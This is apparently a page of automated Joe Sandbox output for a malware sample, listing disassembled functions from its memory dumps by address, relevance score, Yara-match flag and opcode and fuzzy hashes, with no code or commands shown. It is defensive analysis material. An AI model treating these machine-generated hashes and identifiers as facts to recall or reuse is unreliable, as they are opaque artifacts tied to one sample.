                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gxyz
                                                                        • API String ID: 0-2474275795
                                                                        • Opcode ID: fab1ddc81cbafe8202d672c33e7ae630c9dd316eda04d8498dc7fb0170573cc5
                                                                        • Instruction ID: 91b2ad971556b3d1ce70346e187ca0cccc7f4127107a8efc362f52ba1724522e
                                                                        • Opcode Fuzzy Hash: fab1ddc81cbafe8202d672c33e7ae630c9dd316eda04d8498dc7fb0170573cc5
                                                                        • Instruction Fuzzy Hash: 0691AE71604302DBD724CF19C490B6BB7E1FF94398F958A6CE9858B3A0E734D855CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043B130 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gxyz
                                                                        • API String ID: 0-2474275795
                                                                        • Opcode ID: abfc32a211e54abb498c6d15fd3be4c620b37a2adc8098d3a4f6f7ff0b7c7800
                                                                        • Instruction ID: b02ac1c64d3e23abdf7d01ad9d0da45d0e853ea4941b8d0c33160aa4fa6b10bb
                                                                        • Opcode Fuzzy Hash: abfc32a211e54abb498c6d15fd3be4c620b37a2adc8098d3a4f6f7ff0b7c7800
                                                                        • Instruction Fuzzy Hash: A091BD716043029BD724CF19C490B6FB7E1FF88354F259A6DE9858B391E738D845CB8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406C20 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,
                                                                        • API String ID: 0-3772416878
                                                                        • Opcode ID: 9c671d4a5cd9da2760fb7618d3b64249356e78137fe7037415aaf5b02f06e39f
                                                                        • Instruction ID: 3582d2261b08b4d642288eeeaae6fee71727fbe30561ac4a78af7bf5843a7c85
                                                                        • Opcode Fuzzy Hash: 9c671d4a5cd9da2760fb7618d3b64249356e78137fe7037415aaf5b02f06e39f
                                                                        • Instruction Fuzzy Hash: BFB1287120D381AFD315CF68D44465BBBE0AFA9304F444A2EF5D997382C375EA28CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F1B097 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gxyz
                                                                        • API String ID: 0-2474275795
                                                                        • Opcode ID: 5a647d3aa5a1dff1ef0d2f77f279aae155298fdaca688a1214a685b5321326d5
                                                                        • Instruction ID: 32de2186c6896c4c02d9c6213f5cf5907dd56e05d495282785dd3e636c53d36d
                                                                        • Opcode Fuzzy Hash: 5a647d3aa5a1dff1ef0d2f77f279aae155298fdaca688a1214a685b5321326d5
                                                                        • Instruction Fuzzy Hash: 4781CC72A08301DBD714CF14C890B6FB3E1FF88798FA58A1CEA955B290D331E815CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EF0EC2 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: JAF
                                                                        • API String ID: 0-4103162853
                                                                        • Opcode ID: 960f56dc0e55d06e5afef1a6e108c61c4eec523ed62de41dacc84ebcbf1312a7
                                                                        • Instruction ID: 30786062b8c71d323d6e6ce2a30d5bac50a3a6c9d2f139cbdba03801d5b5078d
                                                                        • Opcode Fuzzy Hash: 960f56dc0e55d06e5afef1a6e108c61c4eec523ed62de41dacc84ebcbf1312a7
                                                                        • Instruction Fuzzy Hash: DC818BB0540B008FE375CF28C490BA3B7E6BF85318F04DA2DD6AA87685E775B419CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00410C5B Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: JAF
                                                                        • API String ID: 0-4103162853
                                                                        • Opcode ID: 9128636b99eb7f40b603839eac4711fe0728de6b55a2a56fef665d4a45b70235
                                                                        • Instruction ID: cfe4e2a8978f3ae7d713284cd87d2e3eb9195a7231fafb701f6cf529d3db3fb2
                                                                        • Opcode Fuzzy Hash: 9128636b99eb7f40b603839eac4711fe0728de6b55a2a56fef665d4a45b70235
                                                                        • Instruction Fuzzy Hash: 37816DB0500B009FE735CF24C490BA7B7F6BF45314F148A2ED4AA87681E779B998CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F1BA67 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gxyz
                                                                        • API String ID: 0-2474275795
                                                                        • Opcode ID: 203f6403fcb4f7a42fc299442bd5461aa6ef572c4f4c820d0eeb71d185237d29
                                                                        • Instruction ID: 29fcc245d779c8ce412f903f08cf78fa968146f4d1e57f28e934e1db4cf7eb7b
                                                                        • Opcode Fuzzy Hash: 203f6403fcb4f7a42fc299442bd5461aa6ef572c4f4c820d0eeb71d185237d29
                                                                        • Instruction Fuzzy Hash: 4281A071A08302DFD718CF14C890B6BBBA1FFC5398F58891CE9959B291D731E946CB82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EF7948 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 789:
                                                                        • API String ID: 0-2924019492
                                                                        • Opcode ID: 7c81b131381fa2d393f3127893e0acac1c7e90b9fccbd878a07e85f2b798b2ef
                                                                        • Instruction ID: 81ba2b191bbf6682ac2f85b06f7de01120ef10d5ed823c6a473b5623c6bed1c9
                                                                        • Opcode Fuzzy Hash: 7c81b131381fa2d393f3127893e0acac1c7e90b9fccbd878a07e85f2b798b2ef
                                                                        • Instruction Fuzzy Hash: 22310775A40B408FD725CF14C891B66B3E2EB4A308F59D96DC687C7692DB38E405CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004176E1 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 789:
                                                                        • API String ID: 0-2924019492
                                                                        • Opcode ID: 84606cd881d82e9bb318d4f0a26b9851e8aa3b96b1d02f44d570d103868ee779
                                                                        • Instruction ID: 7b78dbaa38c7b21beee6cf440ef457b437b28244ea0c7ae6acfcb896623c88e2
                                                                        • Opcode Fuzzy Hash: 84606cd881d82e9bb318d4f0a26b9851e8aa3b96b1d02f44d570d103868ee779
                                                                        • Instruction Fuzzy Hash: A631D079A04A408FD325CF24C895BA7B7F2EB46304F58896ED497C7792DB38E846CB44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EF55F7 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 789:
                                                                        • API String ID: 0-2924019492
                                                                        • Opcode ID: 4571cfaf2377829167c8ebaaaa02cbee99a3b2dd67fcdd2fefb6ce212f134d92
                                                                        • Instruction ID: fee86321b48225e852468df19dc169b5ebd8f4be2812528dd4c7b954c9b3aba2
                                                                        • Opcode Fuzzy Hash: 4571cfaf2377829167c8ebaaaa02cbee99a3b2dd67fcdd2fefb6ce212f134d92
                                                                        • Instruction Fuzzy Hash: A82160742506418FE768CF14C8A0A37B3A2FF9A309F65952CC69707A91D731B801CF85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EF3989 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 789:
                                                                        • API String ID: 0-2924019492
                                                                        • Opcode ID: 11d639cc6c82a8d9e11436ea89fc0c77a3a293fb4e335f93bbf0e423cfd0a46e
                                                                        • Instruction ID: 0dec0ea3d55d4a07329d746824031281c0a71afc5be78107aae2a1ed802dc9c9
                                                                        • Opcode Fuzzy Hash: 11d639cc6c82a8d9e11436ea89fc0c77a3a293fb4e335f93bbf0e423cfd0a46e
                                                                        • Instruction Fuzzy Hash: 9621C275250B809BD334CF24C890B67B7B2FB81308F289A5DD696A7685D7B6F801CB44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00413722 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 789:
                                                                        • API String ID: 0-2924019492
                                                                        • Opcode ID: 91002e8592419f02679266217e0656b05884a03e323483f8f31014a3a2b85d26
                                                                        • Instruction ID: 75855608be2bda6d97df851f8e3a2661acfeea8d70f422b91aa9a116a9652a2c
                                                                        • Opcode Fuzzy Hash: 91002e8592419f02679266217e0656b05884a03e323483f8f31014a3a2b85d26
                                                                        • Instruction Fuzzy Hash: 442162752107419BD725CF24C881BA7B3B2FF81305F284A1EE596A7785D7B9F841CB48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EF36E5 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 789:
                                                                        • API String ID: 0-2924019492
                                                                        • Opcode ID: 9ee7a3780df8d0cce336f88aae76a12a161861381e3ad8d7e6b5360619ff9dc4
                                                                        • Instruction ID: 09d690fd40cc05ddc6eafd714fc008fae6000621fa88150c21c529aad58ec2ce
                                                                        • Opcode Fuzzy Hash: 9ee7a3780df8d0cce336f88aae76a12a161861381e3ad8d7e6b5360619ff9dc4
                                                                        • Instruction Fuzzy Hash: 10219D74680B828BD7348F24C890BA7B7F2FB45318F14996CD6A787A92E776A401DB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041347E Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 789:
                                                                        • API String ID: 0-2924019492
                                                                        • Opcode ID: 6632e86e90320e603a285031c02ad9be3a03face611ce7db98c36edb2b210904
                                                                        • Instruction ID: 695dfa75bfd7b84a09a8389b6cc6ea945b72dffd246397d7a94960ee23ad2b5b
                                                                        • Opcode Fuzzy Hash: 6632e86e90320e603a285031c02ad9be3a03face611ce7db98c36edb2b210904
                                                                        • Instruction Fuzzy Hash: 3C21A134640B029BD7348F28C890BA7B7F2BB45315F14492CD2A787B92E379F8419B48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F02DD7 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: h3E
                                                                        • API String ID: 0-1264096165
                                                                        • Opcode ID: 3f696112414c2176a47e66b299e801a383e415b346e735ebcf3c7c746a3e6efe
                                                                        • Instruction ID: afe6950ad1d475a8d9f76adb71a0347002a759e2e263ff058f1fe73003579440
                                                                        • Opcode Fuzzy Hash: 3f696112414c2176a47e66b299e801a383e415b346e735ebcf3c7c746a3e6efe
                                                                        • Instruction Fuzzy Hash: 53F0C22060CBC18EC71ACF298050675FBE0AFA7549F1854DDD9D2976A2D328C50BDB36
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00422B70 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: h3E
                                                                        • API String ID: 0-1264096165
                                                                        • Opcode ID: 3f696112414c2176a47e66b299e801a383e415b346e735ebcf3c7c746a3e6efe
                                                                        • Instruction ID: 3c3bb655185b5af2888637fc8bac67708ee984c1cf6fe0d356e12da658f3a700
                                                                        • Opcode Fuzzy Hash: 3f696112414c2176a47e66b299e801a383e415b346e735ebcf3c7c746a3e6efe
                                                                        • Instruction Fuzzy Hash: 79F0C82020CBD19EC716CF299150676FFE0AF97605F1454CDD4D197362C21CD90ACB2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F02DBB Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: h3E
                                                                        • API String ID: 0-1264096165
                                                                        • Opcode ID: d95b8c7dad6f27eaeeba518d165f6ea783b51c0a4d661dd6bbb858999750f331
                                                                        • Instruction ID: 49a40d6ffe3ce6a2a6cb0f7067359c5aea1f47d095485db594a62ae5f62b6731
                                                                        • Opcode Fuzzy Hash: d95b8c7dad6f27eaeeba518d165f6ea783b51c0a4d661dd6bbb858999750f331
                                                                        • Instruction Fuzzy Hash: 1AE0223064C7808FC309CF28C080636FBE0AF97944F14549CD9C2D72A1D328C90BCA26
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00422B54 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: h3E
                                                                        • API String ID: 0-1264096165
                                                                        • Opcode ID: d95b8c7dad6f27eaeeba518d165f6ea783b51c0a4d661dd6bbb858999750f331
                                                                        • Instruction ID: 364beef6f316d3f83652dd8aa71acb0ec1cc879e8a2107f1598c1c26b9198e98
                                                                        • Opcode Fuzzy Hash: d95b8c7dad6f27eaeeba518d165f6ea783b51c0a4d661dd6bbb858999750f331
                                                                        • Instruction Fuzzy Hash: B9E0223020C7908EC309CF28E110236FBE1AF9B600F2454DED4C2D73A2C228DA07CA1A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EF42A2 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: :^F
                                                                        • API String ID: 0-1832529195
                                                                        • Opcode ID: f8a9e0cc216a639e61236eec9da2288ad57904349f70ab7f3e7e58259bc75aec
                                                                        • Instruction ID: 96e9b2943a4139edaf74c0c3371c96c706cc273dac931919ebbf9b056006b95f
                                                                        • Opcode Fuzzy Hash: f8a9e0cc216a639e61236eec9da2288ad57904349f70ab7f3e7e58259bc75aec
                                                                        • Instruction Fuzzy Hash: D9E01A5594F3C05FDB079B706C618A67F3A5FC7200B0E50EBD5C9CB2A3C4294A29C36A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041403B Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: :^F
                                                                        • API String ID: 0-1832529195
                                                                        • Opcode ID: f8a9e0cc216a639e61236eec9da2288ad57904349f70ab7f3e7e58259bc75aec
                                                                        • Instruction ID: 7f238519bb71acc741d5806136ffcdbde4ed3e01776cef76c6de01323dd1d1f1
                                                                        • Opcode Fuzzy Hash: f8a9e0cc216a639e61236eec9da2288ad57904349f70ab7f3e7e58259bc75aec
                                                                        • Instruction Fuzzy Hash: 4BE01A5594F3C05FD7079B306C668A67F3A4BC7204B0E40EBD589CB2A3C4384A2DD36A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE84B7 Relevance: .8, Instructions: 838COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 435dda0fb1058ae0c354b804381dd7332caf4fb88a15195ce510d51b464d2fe4
                                                                        • Instruction ID: cb911dd85259c384e944177472f790c818d10ac9facc49b90f0917b16230cf37
                                                                        • Opcode Fuzzy Hash: 435dda0fb1058ae0c354b804381dd7332caf4fb88a15195ce510d51b464d2fe4
                                                                        • Instruction Fuzzy Hash: 5442F271A487118BCB24DF5CD8902BAB3E1FFC4309F199A2DD9C7872A0E735A855CB46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00408250 Relevance: .8, Instructions: 838COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7adaa9030472540322c0ea0439d7f9ea15d3f567da48d443112dd89697c86400
                                                                        • Instruction ID: 8e0b0e565702dfa17293f9822380880f2cefb75c82aa9d3233e25a6e97479de0
                                                                        • Opcode Fuzzy Hash: 7adaa9030472540322c0ea0439d7f9ea15d3f567da48d443112dd89697c86400
                                                                        • Instruction Fuzzy Hash: 4842C2716087118BC7249F58D9802BBB3E1FFC4315F198A3ED9C6972C1EB39A851CB4A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE39D7 Relevance: .7, Instructions: 740COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e16998144063c05dce295d15eb7c8ceb909d85e680bce1ba7756dbbb00416931
                                                                        • Instruction ID: a0aa5fe45beb97cdafffaca820edeb244714ef7d139242ad3d0d92a4a5598e31
                                                                        • Opcode Fuzzy Hash: e16998144063c05dce295d15eb7c8ceb909d85e680bce1ba7756dbbb00416931
                                                                        • Instruction Fuzzy Hash: B962B0316087558FCB15CF28C0806AABBE1FF88318F19DA6DE8DAA7391D735E945CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403770 Relevance: .7, Instructions: 740COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e16998144063c05dce295d15eb7c8ceb909d85e680bce1ba7756dbbb00416931
                                                                        • Instruction ID: 73b595a4cf86748e21d25ce7704d43bb49468afad9e608c8bc6c8a51c1a37b90
                                                                        • Opcode Fuzzy Hash: e16998144063c05dce295d15eb7c8ceb909d85e680bce1ba7756dbbb00416931
                                                                        • Instruction Fuzzy Hash: 5762B6716083558FCB14CF28C0806AABBE1FF84314F198A7EE9D9A7391D739E945CB85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE44C7 Relevance: .6, Instructions: 607COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bbac4e3c24768073cd9ee3c00bf2cba0e4114676d71a43e44aef05e0dfe1ee6f
                                                                        • Instruction ID: 25cbeaf50577887e6dabea9c7c7478e8e99e1a7169e1e9fc0a5824c7a767e430
                                                                        • Opcode Fuzzy Hash: bbac4e3c24768073cd9ee3c00bf2cba0e4114676d71a43e44aef05e0dfe1ee6f
                                                                        • Instruction Fuzzy Hash: E24255B4544B518FCB28CF29C59066ABBF1FF45314B50AA2DE5AB8BB90D335F844CB04
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404260 Relevance: .6, Instructions: 607COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e6737ce442aca3cb48541b79f6f28aabd974b097d3cf9fcd0d7b3a7e386c2c55
                                                                        • Instruction ID: 38a15df94abf4cf7b43e648ef849d5cce1ccd0175b96e4834503d466bf82ff7e
                                                                        • Opcode Fuzzy Hash: e6737ce442aca3cb48541b79f6f28aabd974b097d3cf9fcd0d7b3a7e386c2c55
                                                                        • Instruction Fuzzy Hash: EA4236B1514B518FC368CF28C69066ABBF1BF95310B508A2ED6979BBD0D339F845CB18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE1267 Relevance: .5, Instructions: 536COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
